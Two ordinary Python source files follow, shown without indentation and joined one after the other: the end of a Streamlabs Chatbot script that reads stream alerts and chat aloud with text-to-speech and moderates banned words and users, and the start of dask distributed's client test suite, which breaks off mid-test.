ttsMessage = ScriptSettings.TwitchResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchSubDelay, ScriptSettings.TwitchIncludeSubMessage, message.Message, message.Name)
except Exception as e:
Parent.SendStreamWhisper(Parent.GetChannelName(), 'Failed to process subscription. Please see logs (i).')
Parent.Log(ScriptName, str(e.args))
elif evntdata and evntdata.For == "mixer_account":
if evntdata.Type == "follow" and ScriptSettings.MixerOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.MixerFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerFollowDelay)
elif evntdata.Type == "subscription" and ScriptSettings.MixerOnSub:
for message in evntdata.Message:
ttsMessage = ''
if message.Months == 1:
ttsMessage = ScriptSettings.MixerSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
ttsMessage = ScriptSettings.MixerResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerSubDelay, ScriptSettings.MixerIncludeSubMessage, message.Message, message.Name)
elif evntdata.Type == "host" and ScriptSettings.MixerOnHost:
s = ''
for message in evntdata.Message:
if int(message.Viewers) >= ScriptSettings.MixerHostMinimum:
if message.Viewers > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.MixerHostMessage.format(name=message.Name, amount=str(message.Viewers), isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerHostDelay)
elif evntdata and evntdata.For == "streamlabs":
if evntdata.Type == "donation" and ScriptSettings.StreamlabsOnDonation:
for message in evntdata.Message:
if float(message.Amount) >= ScriptSettings.StreamlabsDonationMinimum:
ttsMessage = ScriptSettings.StreamlabsDonationMessage.format(name=message.Name, amount=str(message.FormattedAmount))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.StreamlabsDonationDelay, ScriptSettings.StreamlabsIncludeDonationMessage, message.Message, message.Name)
elif evntdata and evntdata.For == "youtube_account":
if evntdata.Type == "follow" and ScriptSettings.YoutubeOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.YoutubeFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeFollowDelay)
elif evntdata.Type == "subscription" and ScriptSettings.YoutubeOnSub:
for message in evntdata.Message:
ttsMessage = ''
if message.Months == 1:
ttsMessage = ScriptSettings.YoutubeSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
ttsMessage = ScriptSettings.YoutubeResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeSubDelay)
elif evntdata.Type == "superchat" and ScriptSettings.YoutubeOnSuperchat:
for message in evntdata.Message:
if float(message.Amount) >= ScriptSettings.YoutubeSuperchatMinimum:
ttsMessage = ScriptSettings.YoutubeSuperchatMessage.format(name=message.Name, amount=str(message.FormattedAmount))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeSuperchatDelay, ScriptSettings.YoutubeIncludeSuperchatMessage, message.Message, message.Name)
#---------------------------------------
# Script Functions
#---------------------------------------
def updateUIConfig():
voices = []
for voice in spk.GetInstalledVoices():
info = voice.VoiceInfo
voices.append(info.Name)
UIConfigs = UIConfig(UIConfigFile)
UIConfigs.VoiceName['items'] = voices
if ScriptSettings.VoiceName not in voices:
ScriptSettings.VoiceName = ''
ScriptSettings.Save(SettingsFile)
UIConfigs.Save(UIConfigFile)
def updateBannedSettings():
global ScriptSettings, reBanned, bannedWords, bannedUsers
ScriptSettings.BannedActionBoolean = bool(ScriptSettings.BannedAction == 'Skip Messages with Banned Words')
if ScriptSettings.BannedMatchWholeWord:
reBanned = re.compile(r"\b({0})\b".format('|'.join(bannedWords)), re.IGNORECASE)
else:
reBanned = re.compile(r"({0})".format('|'.join(bannedWords)), re.IGNORECASE)
def SendOverlayUpdate(message):
""" Send updated information to the overlay. """
message = message.encode('utf8', 'replace')
payload = {
'message': message,
'time': ScriptSettings.TTSOverlayTime,
'fontColor': ScriptSettings.TTSOverlayFontColor,
'useOutline': ScriptSettings.TTSOverlayUseFontOutline,
'fontOutline': ScriptSettings.TTSOverlayFontOutline,
'useShadow': ScriptSettings.TTSOverlayUseFontShadow,
'fontShadow': ScriptSettings.TTSOverlayFontShadow,
'fontSize': ScriptSettings.TTSOverlayFontSize,
'font': ScriptSettings.TTSOverlayFont,
'useBackground': ScriptSettings.TTSOverlayUseBackground,
'background': ScriptSettings.TTSOverlayBackgroundColor,
'useBorder': ScriptSettings.TTSOverlayUseBorder,
'border': ScriptSettings.TTSOverlayBorderColor,
'horizontalAlign': ScriptSettings.TTSOverlayHorizontalAlign,
'verticalAlign': ScriptSettings.TTSOverlayVerticalAlign,
'animateIn': ScriptSettings.TTSOverlayAnimateIn,
'animateOut': ScriptSettings.TTSOverlayAnimateOut,
}
Parent.BroadcastWsEvent("EVENT_TTS_AC_OVERLAY", json.dumps(payload))
def SendTTSMessage(voice, message, isAlert, user = '', text = '', displayName = ''):
if user and user in bannedUsers:
return
if user and not text:
text = message
if not isAlert and user and ScriptSettings.MaxCharacters != 0 and len(message) > ScriptSettings.MaxCharacters:
Parent.SendStreamMessage(ScriptSettings.MaxCharacterMessage.format(user=displayName))
return
if ScriptSettings.BannedActionBoolean:
if bool(reBanned.search(message)):
return
else:
message = reBanned.sub(ScriptSettings.BannedReplacement, message)
text = reBanned.sub(ScriptSettings.BannedReplacement, text)
displayName = reBanned.sub(ScriptSettings.BannedReplacement, displayName)
try:
if (isAlert and not ScriptSettings.TTSOverlayExcludeAlerts) or (not isAlert and not user):
SendOverlayUpdate(message)
elif not isAlert:
SendOverlayUpdate(ScriptSettings.TTSOverlayMessage.format(user=displayName, message=text))
voice.Speak(message)
except Exception as e:
Parent.SendStreamWhisper(Parent.GetChannelName(), 'TTS Failed, please see the script logs (i).')
Parent.Log(ScriptName, str(e.args))
def SendTTSMessagesWithDelay(message, delay, includeExtra = False, extraMessage = '', user = ''):
if delay > 0:
time.sleep(delay)
global spk
SendTTSMessage(spk, message, True)
if includeExtra:
SendTTSMessage(spk, extraMessage, False, user)
def readFileArray(fileToRead):
lines = []
with open(fileToRead) as f:
lines = f.readlines()
lines = [x.strip().decode("utf-8", "replace") for x in lines]
return lines
def writeArrayToFile(arrayToWrite, fileToWrite):
with open(fileToWrite, 'w') as f:
f.write('\n'.join(arrayToWrite).encode('utf8', 'replace'))
def handleBanUser(data, user):
global bannedUsers
if user in bannedUsers:
bannedUsers.remove(user)
Parent.SendStreamMessage(ScriptSettings.BanUserRemoveResponse.format(user=data.UserName, banned=user))
else:
bannedUsers.append(user)
Parent.SendStreamMessage(ScriptSettings.BanUserAddResponse.format(user=data.UserName, banned=user))
writeArrayToFile(bannedUsers, BannedUserFile)
#---------------------------------------
# Chatbot Initialize Function
#---------------------------------------
def Init():
# Load settings from file and verify
global ScriptSettings
ScriptSettings = Settings(SettingsFile)
global spk
spk = SpeechSynthesizer()
spk.Rate = ScriptSettings.Rate
spk.Volume = ScriptSettings.Volume
updateUIConfig()
global bannedWords, bannedUsers
bannedUsers = readFileArray(BannedUserFile)
bannedWords = readFileArray(BannedWordFile)
updateBannedSettings()
if ScriptSettings.VoiceName != '':
spk.SelectVoice(ScriptSettings.VoiceName)
# Init the Streamlabs Event Receiver
global EventReceiver
EventReceiver = StreamlabsEventClient()
EventReceiver.StreamlabsSocketConnected += EventReceiverConnected
EventReceiver.StreamlabsSocketDisconnected += EventReceiverDisconnected
EventReceiver.StreamlabsSocketEvent += EventReceiverEvent
# Auto Connect if key is given in settings
if ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
# End of Init
return
#---------------------------------------
# Chatbot Save Settings Function
#---------------------------------------
def ReloadSettings(jsondata):
# Reload newly saved settings and verify
ScriptSettings.Reload(jsondata)
updateBannedSettings()
if ScriptSettings.VoiceName != '':
global spk
spk.SelectVoice(ScriptSettings.VoiceName)
spk.Rate = ScriptSettings.Rate
spk.Volume = ScriptSettings.Volume
global EventReceiver
if not EventReceiver.IsConnected and ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
elif EventReceiver.IsConnected and not ScriptSettings.SocketToken:
EventReceiver.Disconnect()
# End of ReloadSettings
return
#---------------------------------------
# Chatbot Script Unload Function
#---------------------------------------
def Unload():
global EventReceiver
if EventReceiver.IsConnected:
EventReceiver.Disconnect()
EventReceiver = None
#---------------------------
# [Optional] ScriptToggled (Notifies you when a user disables your script or enables it)
#---------------------------
def ScriptToggled(state):
global EventReceiver
if not state and EventReceiver.IsConnected:
EventReceiver.Disconnect()
elif state and not EventReceiver.IsConnected and ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
return
#---------------------------------------
# Chatbot Execute Function
#---------------------------------------
def Execute(data):
if data.IsChatMessage():
command = data.GetParam(0)
if command == ScriptSettings.TTSCommand and IsFromValidSource(data, ScriptSettings.TTSCommandUsage, ScriptSettings.TTSCommandUsageReply, ScriptSettings.TTSCommandUsageReplyMessage):
if HasPermission(data, ScriptSettings.TTSCommandPermission, ScriptSettings.TTSCommandPermissionInfo):
if not IsOnCooldown(data, ScriptSettings.TTSCommand, ScriptSettings.TTSCasterCD, ScriptSettings.TTSUseCD, ScriptSettings.TTSOnCooldown, ScriptSettings.TTSOnUserCooldown):
if HasCurrency(data, ScriptSettings.TTSCommandCost):
commandOffset = len(ScriptSettings.TTSCommand) + 1
text = data.Message[commandOffset:]
message = ScriptSettings.TTSCommandMessage.format(user=data.UserName, message=text)
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, message, False, data.UserName.lower(), text, data.UserName))
messageThread.daemon = True
messageThread.start()
Parent.AddUserCooldown(ScriptName, ScriptSettings.TTSCommand, data.User, ScriptSettings.TTSUserCooldown)
Parent.AddCooldown(ScriptName, ScriptSettings.TTSCommand, ScriptSettings.TTSCooldown)
elif command == ScriptSettings.BanWordCommand and HasPermission(data, ScriptSettings.BanWordCommandPermission, ScriptSettings.BanWordCommandPermissionInfo) and data.GetParamCount() > 1:
message = data.GetParam(1)
i = 2
while i < data.GetParamCount():
message = message + ' ' + data.GetParam(i)
i = i + 1
if message:
global bannedWords
isPhrase = (' ' in message)
if message in bannedWords:
bannedWords.remove(message)
if isPhrase:
Parent.SendStreamMessage(ScriptSettings.BanWordRemoveResponse.format(user=data.UserName, word=message))
else:
Parent.SendStreamMessage(ScriptSettings.BanWordRemoveResponse.format(user=data.UserName, word=message))
else:
bannedWords.append(message)
if isPhrase:
Parent.SendStreamMessage(ScriptSettings.BanWordAddResponse.format(user=data.UserName, word=message))
else:
Parent.SendStreamMessage(ScriptSettings.BanWordAddResponse.format(user=data.UserName, word=message))
writeArrayToFile(bannedWords, BannedWordFile)
updateBannedSettings()
elif command == ScriptSettings.BanUserCommand and HasPermission(data, ScriptSettings.BanUserCommandPermission, ScriptSettings.BanUserCommandPermissionInfo) and data.GetParamCount() > 1:
user = data.GetParam(1).lower()
if user:
handleBanUser(data, user)
if data.GetParamCount() > 2:
time = data.GetParam(2)
if time.isdigit():
banThread = threading.Timer(int(time), handleBanUser, args=(data, user))
banThread.daemon = True
banThread.start()
if ScriptSettings.TTSAllChat and IsFromValidSource(data, ScriptSettings.TTSAllChatUsage, ScriptSettings.TTSAllChatUsageReply, ScriptSettings.TTSAllChatUsageReplyMessage):
if not ScriptSettings.TTSAllChatExcludeCommands or command[0] != '!':
if "msg-id=highlighted-message" in data.RawData:
message = ScriptSettings.TTSAllChatMessage.format(user=data.UserName, message=data.Message)
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, message, False, data.UserName.lower(), data.Message, data.UserName))
messageThread.daemon = True
messageThread.start()
# End of execute
return
#---------------------------------------
# Chatbot Execute Helper Functions
#---------------------------------------
def SendResp(data, Message):
"""Sends message to Stream or discord chat depending on settings"""
if not data.IsFromDiscord() and not data.IsWhisper():
Parent.SendStreamMessage(Message)
if not data.IsFromDiscord() and data.IsWhisper():
Parent.SendStreamWhisper(data.User, Message)
if data.IsFromDiscord() and not data.IsWhisper():
Parent.SendDiscordMessage(Message)
if data.IsFromDiscord() and data.IsWhisper():
Parent.SendDiscordDM(data.User, Message)
def IsFromValidSource(data, Usage, SendResponse, UsageResponse):
"""Return true or false depending on the message is sent from
a source that's in the usage setting or not"""
usedDiscord = data.IsFromDiscord()
usedWhisper = data.IsWhisper()
if not usedDiscord:
l = ["Stream Chat", "Chat Both", "All", "Stream Both"]
if not usedWhisper and (Usage in l):
return True
l = ["Stream Whisper", "Whisper Both", "All", "Stream Both"]
if usedWhisper and (Usage in l):
return True
if usedDiscord:
l = ["Discord Chat", "Chat Both", "All", "Discord Both"]
if not usedWhisper and (Usage in l):
return True
l = ["Discord Whisper", "Whisper Both", "All", "Discord Both"]
if usedWhisper and (Usage in l):
return True
if SendResponse:
message = UsageResponse.format(user=data.UserName, usage=Usage)
SendResp(data, message)
return False
def HasPermission(data, permission, permissionInfo):
"""Returns true if user has permission and false if user doesn't"""
if not Parent.HasPermission(data.User, permission, permissionInfo):
return False
return True
def IsOnCooldown(data, command, casterCD, useCD, cooldownMessage, userCooldownMessage):
"""Return true if command is on cooldown and send cooldown message if enabled"""
#introduce globals for cooldown management
cooldown = Parent.IsOnCooldown(ScriptName, command)
userCooldown = Parent.IsOnUserCooldown(ScriptName, command, data.User)
caster = (Parent.HasPermission(data.User, "Caster", "") and casterCD)
#check if command is on cooldown
if (cooldown or userCooldown) and caster is False:
#check if cooldown message is enabled
if useCD:
#set variables for cooldown
cooldownDuration = Parent.GetCooldownDuration(ScriptName, command)
userCDD = Parent.GetUserCooldownDuration(ScriptName, command, data.User)
#check for the longest CD!
if cooldownDuration > userCDD:
#set cd remaining
m_CooldownRemaining = cooldownDuration
#send cooldown message
message = cooldownMessage.format(user=data.UserName, cooldown=m_CooldownRemaining)
SendResp(data, message)
else: #set cd remaining
m_CooldownRemaining = userCDD
#send usercooldown message
message = userCooldownMessage.format(user=data.UserName, cooldown=m_CooldownRemaining)
SendResp(data, message)
return True
return False
def HasCurrency(data, cost):
if (cost == 0) or (Parent.RemovePoints(data.User, data.UserName, cost)):
return True
return False
#---------------------------------------
# Chatbot Tick Function
#---------------------------------------
def Tick():
# End of Tick
return
#---------------------------------------
# Chatbot Parameter Parser
#---------------------------------------
def Parse(parseString, user, target, message):
result = RegTTS.search(parseString)
if result:
paramMessage = result.group(0)
ttsMessage = result.group("message")
parseString = parseString.replace(paramMessage, "")
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, ttsMessage, False))
messageThread.daemon = True
messageThread.start()
# Return unaltered parseString
return parseString
#---------------------------------------
# Chatbot Button Function
#---------------------------------------
def OpenOverlayFolder():
"""Open the overlay folder in the scripts folder"""
os.startfile(os.path.join(os.path.dirname(__file__), "overlay"))
def OpenReadMe():
"""Open the README.txt in the scripts folder"""
os.startfile(os.path.join(os.path.dirname(__file__), "README.txt"))
def OpenBannedWordFile():
"""Open the banned.txt in the scripts folder"""
os.startfile(BannedWordFile)
def OpenBannedUserFile():
"""Open the users.txt in the scripts folder"""
os.startfile(BannedUserFile)
def OpenAnimateDemo():
"""Open Animation Demo Website"""
OpenLink("https://daneden.github.io/animate.css/")
def OpenSocketToken():
"""Open Streamlabs API Settings"""
OpenLink("https://streamlabs.com/dashboard#/settings/api-settings")
def OpenOriginalGithubRepository():
"""Open the GitHub Repository for this script"""
OpenLink("https://github.com/kruiser8/TTS-Alerts-And-Chat")
def OpenTwitter():
"""Open the Twitter of the original author"""
OpenLink("https://twitter.com/kruiser8")
def OpenBlog():
"""Open fixel.ru"""
OpenLink("https://fixel.ru/")
def OpenLink(link):
"""Open links through buttons in UI"""
os.system("explorer " + link)
|
test_client.py
|
import asyncio
import gc
import logging
import os
import pickle
import random
import subprocess
import sys
import threading
import traceback
import warnings
import weakref
import zipfile
from collections import deque
from contextlib import suppress
from functools import partial
from operator import add
from threading import Semaphore
from time import sleep
import psutil
import pytest
from tlz import concat, first, identity, isdistinct, merge, pluck, valmap
import dask
import dask.bag as db
from dask import delayed
from dask.optimization import SubgraphCallable
from dask.utils import stringify
from distributed import (
CancelledError,
Executor,
LocalCluster,
Nanny,
TimeoutError,
Worker,
fire_and_forget,
get_client,
get_worker,
performance_report,
profile,
secede,
)
from distributed.client import (
Client,
Future,
_get_global_client,
as_completed,
default_client,
futures_of,
get_task_metadata,
temp_default_client,
tokenize,
wait,
)
from distributed.comm import CommClosedError
from distributed.compatibility import MACOS, WINDOWS
from distributed.core import Status
from distributed.metrics import time
from distributed.scheduler import CollectTaskMetaDataPlugin, KilledWorker, Scheduler
from distributed.sizeof import sizeof
from distributed.utils import is_valid_xml, mp_context, sync, tmp_text, tmpfile
from distributed.utils_test import ( # noqa: F401
TaskStateMetadataPlugin,
a,
async_wait_for,
asyncinc,
b,
captured_logger,
cleanup,
)
from distributed.utils_test import client as c # noqa: F401
from distributed.utils_test import client_secondary as c2 # noqa: F401
from distributed.utils_test import ( # noqa: F401
cluster,
cluster_fixture,
dec,
div,
double,
gen_cluster,
gen_test,
geninc,
inc,
loop,
loop_in_thread,
map_varying,
nodebug,
popen,
pristine_loop,
randominc,
s,
save_sys_modules,
slowadd,
slowdec,
slowinc,
throws,
varying,
wait_for,
)
@gen_cluster(client=True, timeout=None)
async def test_submit(c, s, a, b):
x = c.submit(inc, 10)
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = await x
assert result == 11
assert x.done()
y = c.submit(inc, 20)
z = c.submit(add, x, y)
result = await z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
async def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = await L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = await L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = await total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = await L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = await c.gather(L4)
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = await c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = await c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = await c.gather(L1)
assert results == []
@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert await x == 2
assert await y == 4
assert await z == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert await x == 2
assert await y == 4
with pytest.raises(ZeroDivisionError, match="eight"):
await z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 4
with pytest.raises(ZeroDivisionError, match="seven"):
await z
@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
result = c.map(inc, range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(1, 101))
result = c.map(add, range(100), range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(0, 200, 2))
# mismatch shape
result = c.map(add, range(100, 200), range(10), batch_size=2)
result = await c.gather(result)
assert result == list(range(100, 120, 2))
@gen_cluster(client=True)
async def test_custom_key_with_batches(c, s, a, b):
""" Test of <https://github.com/dask/distributed/issues/4588>"""
futs = c.map(
lambda x: x ** 2,
range(10),
batch_size=5,
key=[str(x) for x in range(10)],
)
assert len(futs) == 10
await wait(futs)
@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
await x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
@gen_cluster(client=True)
async def test_compute_retries_annotations(c, s, a, b):
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
with dask.annotate(retries=2):
x = delayed(varying(xargs))()
y = delayed(varying(yargs))()
x, y = c.compute([x, y], optimize_graph=False)
gc.collect()
assert await x == 30
with pytest.raises(ZeroDivisionError, match="five"):
await y
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.compute([x, y, z], optimize_graph=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert await fut == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert await fut == 3
@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert await x == 3
@gen_cluster(client=True)
async def test_persist_retries_annotations(c, s, a, b):
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.persist([x, y, z], optimize_graph=False)
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
pd = pytest.importorskip("pandas")
x = c.submit(inc, 10)
y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
await x
await y
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
assert "int" in func(x)
assert "pandas" in func(y)
assert "DataFrame" in func(y)
@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = await x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = await x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
await x
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(div, 1, 0)
await x.exception()
x.release()
await asyncio.sleep(0)
assert not c.futures
def test_Future_release_sync(c):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
x.result()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = await x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await x
x = c.submit(div, 10, 2) # continues to operate
result = await x
assert result == 10 / 2
@gen_cluster()
async def test_gc(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
await x
assert s.tasks[x.key].who_has
x.__del__()
await async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
await c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(TimeoutError):
x.result(timeout="10 ms")
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = await c.gather(x)
assert result == 11
result = await c.gather([x])
assert result == [11]
result = await c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
await a.close()
with pytest.raises(Exception):
await c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await c.gather([x, y])
[xx] = await c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = await c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
await c.gather(futures)
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True, timeout=None)
async def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = await future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = await c.gather(futures)
assert result == [2]
futures = c.get({}, [], sync=False)
result = await c.gather(futures)
assert result == []
result = await c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 2
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
